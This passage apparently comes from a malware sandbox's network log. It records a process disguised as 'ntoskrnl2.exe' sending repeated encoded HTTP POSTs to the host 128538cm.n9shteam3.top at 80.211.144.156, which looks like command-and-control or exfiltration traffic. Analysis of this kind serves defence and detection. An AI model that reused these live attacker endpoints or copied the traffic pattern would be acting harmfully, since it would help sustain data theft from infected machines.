                                                            Data Ascii: PU_U[EYW[_VZWUPXUY^@P]ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'!)=;832"0>\<(;B8$9T<8*4$Z=!&X.*%^./]+
                                                            Sep 2, 2024 13:34:47.307096004 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:47.441076040 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            70 | 192.168.2.6 | 49817 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:47.575963974 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:47.934787035 CEST1028OUTData Raw: 55 51 5f 51 5b 46 59 50 5b 5f 56 5a 57 5f 50 5a 55 5d 5e 42 50 5a 5a 5b 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UQ_Q[FYP[_VZW_PZU]^BPZZ[YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''1=8^$&$<;/B(Y3<V+; )()W5.%^./]+
                                                            Sep 2, 2024 13:34:48.229660034 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:48.353131056 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            71 | 192.168.2.6 | 49818 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:47.813683033 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:48.167489052 CEST1340OUTData Raw: 55 56 5f 52 5b 44 5c 56 5b 5f 56 5a 57 58 50 5a 55 5d 5e 49 50 59 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UV_R[D\V[_VZWXPZU]^IPYZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y'-_<(,'T*0.(><];$40?8 V>3=!X-%^./]+<
                                                            Sep 2, 2024 13:34:48.471065044 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:48.601803064 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 56 23 1d 3f 50 31 5d 20 5b 3e 00 3a 5a 2b 03 0e 42 3a 11 20 59 24 39 24 07 3f 32 26 09 26 00 2d 13 29 2c 3d 5d 28 0b 39 11 36 0e 20 5b 03 1f 25 17 22 32 2d 0c 26 3b 3e 00 33 37 00 1b 20 37 27 06 3d 04 36 53 33 13 33 01 34 22 26 56 38 2d 00 50 25 01 34 12 2e 3c 22 14 31 3e 2a 56 08 16 38 56 29 2f 3a 5c 23 0e 24 05 37 01 39 56 37 18 20 0e 24 33 27 53 27 04 22 0e 25 2d 3c 09 28 2d 01 16 24 2a 2d 16 37 0d 2d 19 2d 13 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: V#?P1] [>:Z+B: Y$9$?2&&-),=](96 [%"2-&;>37 7'=6S334"&V8-P%4.<"1>*V8V)/:\#$79V7 $3'S'"%-<(-$*-7--$P.-V0WS


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            72 | 192.168.2.6 | 49819 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:48.505717993 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:48.853290081 CEST1028OUTData Raw: 55 50 5a 51 5b 41 59 53 5b 5f 56 5a 57 5c 50 52 55 5d 5e 49 50 5b 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UPZQ[AYS[_VZW\PRU]^IP[Z]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'!\?+''1)X'.2\?88$=T+/)7#?2>-%^./]+,
                                                            Sep 2, 2024 13:34:49.180048943 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:49.305191994 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:34:49.647269964 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            73 | 192.168.2.6 | 49820 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:49.649369001 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:49.993706942 CEST1028OUTData Raw: 50 53 5f 55 5e 49 5c 51 5b 5f 56 5a 57 5c 50 59 55 50 5e 47 50 52 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PS_U^I\Q[_VZW\PYUP^GPRZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[3""??\%2'9+8;'/>??*B8Z>W*_9:%^./]+,
                                                            Sep 2, 2024 13:34:50.305536985 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:50.434478045 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            74 | 192.168.2.6 | 49821 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:50.583271027 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:50.937712908 CEST1028OUTData Raw: 50 52 5a 5f 5e 41 59 5d 5b 5f 56 5a 57 54 50 5e 55 50 5e 41 50 53 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PRZ_^AY][_VZWTP^UP^APSZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3(+8$![0.)+-?,$3'Z9V+(0)$^>&_9%^./]+
                                                            Sep 2, 2024 13:34:51.256860018 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:51.381167889 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            75 | 192.168.2.6 | 49822 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:52.240063906 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:52.587743044 CEST1024OUTData Raw: 55 50 5a 5f 5e 48 5c 50 5b 5f 56 5a 57 5d 50 5c 55 50 5e 41 50 53 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UPZ_^H\P[_VZW]P\UP^APSZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$0?8^3_$.*X+=#8$Z&<W?0P>+=".:%^./]+0
                                                            Sep 2, 2024 13:34:52.896509886 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:53.034858942 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            76 | 192.168.2.6 | 49823 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:53.170660973 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:53.525063992 CEST1028OUTData Raw: 50 53 5a 54 5e 43 5c 50 5b 5f 56 5a 57 5f 50 5e 55 5d 5e 49 50 5e 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZT^C\P[_VZW_P^U]^IP^ZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$0W.<;$$T)$=:]>>8-433%<W=)>]-*%^./]+


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            77 | 192.168.2.6 | 49824 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:53.610939980 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:54.121349096 CEST  1340  OUT  Data Raw: 55 55 5a 56 5e 45 5c 57 5b 5f 56 5a 57 5b 50 5e 55 5d 5e 42 50 5a 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UUZV^E\W[_VZW[P^U]^BPZZ_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''"!Y=;7\3&$.:X([$/0Z5*((U)$?*2"Y-*%^./]+0
                                                            Sep 2, 2024 13:34:54.257817984 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:54.478786945 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:54.485785961 CEST  308  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 1e 23 37 33 56 31 38 2c 13 3e 29 22 59 29 3d 0e 40 39 06 24 5a 30 2a 23 59 28 54 21 1b 25 2a 21 5c 29 3c 21 5c 28 32 31 52 21 34 20 5b 03 1f 25 18 37 22 36 57 24 38 2d 1f 27 09 03 05 35 37 3b 05 29 04 25 0e 33 03 24 5d 23 21 22 54 3b 04 3e 57 26 28 2b 02 3a 2f 32 15 25 2e 2a 56 08 16 38 56 2b 3c 39 01 22 37 0d 1f 21 38 00 0d 20 18 3b 53 27 30 3f 54 30 2a 0f 56 24 58 38 0e 3e 13 2b 5f 27 17 3a 04 23 0d 2d 50 2d 39 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: #73V18,>)"Y)=@9$Z0*#Y(T!%*!\)<!\(21R!4 [%7"6W$8-'57;)%3$]#!"T;>W&(+:/2%.*V8V+<9"7!8 ;S'0?T0*V$X8>+_':#-P-9$P.-V0WS


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            78          192.168.2.6  49825        80.211.144.156  80                7552  C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:34:53.762196064 CEST  346  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:54.198261023 CEST  1028  OUT  Data Raw: 55 5e 5a 5f 5e 47 5c 50 5b 5f 56 5a 57 5b 50 53 55 5b 5e 42 50 5e 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^Z_^G\P[_VZW[PSU[^BP^ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$1+8#$%_0>+.(],48X'<-R<U=7#>Y::%^./]+0
                                                            Sep 2, 2024 13:34:54.437721968 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:54.643871069 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            79          192.168.2.6  49826        80.211.144.156  80                7552  C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:34:54.909677029 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:55.259227037 CEST  1028  OUT  Data Raw: 50 56 5a 5f 5e 45 59 55 5b 5f 56 5a 57 55 50 5a 55 58 5e 46 50 5a 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PVZ_^EYU[_VZWUPZUX^FPZZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$32%](+$$2=Y$^?> ]/$]0Z*?(<Q>4>:X::%^./]+
                                                            Sep 2, 2024 13:34:55.562895060 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:55.704981089 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            80          192.168.2.6  49827        80.211.144.156  80                7552  C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:34:55.855164051 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:56.212521076 CEST  1028  OUT  Data Raw: 55 5e 5a 51 5e 45 59 50 5b 5f 56 5a 57 55 50 5e 55 59 5e 48 50 5e 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^ZQ^EYP[_VZWUP^UY^HP^Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3!+^'235<'87;3=R('*Y).^9%^./]+
                                                            Sep 2, 2024 13:34:56.519773960 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:56.648953915 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            81          192.168.2.6  49828        80.211.144.156  80                7552  C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:34:56.786775112 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:57.137279034 CEST  1028  OUT  Data Raw: 55 5f 5a 50 5e 48 59 5c 5b 5f 56 5a 57 5c 50 5e 55 58 5e 40 50 5c 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U_ZP^HY\[_VZW\P^UX^@P\Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''!.=($"5_'X&?.(Z8' $R((='8[)W>.%^./]+,
                                                            Sep 2, 2024 13:34:57.438268900 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:57.557244062 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            82          192.168.2.6  49829        80.211.144.156  80                7552  C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Sep 2, 2024 13:34:57.687086105 CEST  322  OUT  POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:58.040652990 CEST  1028  OUT  Data Raw: 55 51 5f 51 5e 41 5c 51 5b 5f 56 5a 57 5b 50 5e 55 5a 5e 41 50 5b 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UQ_Q^A\Q[_VZW[P^UZ^AP[Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3"-(?$50.&(>';$$0Z"*8*B<>>9:%^./]+0
                                                            Sep 2, 2024 13:34:58.344638109 CEST  25  IN  HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:58.558609009 CEST  158  IN  HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
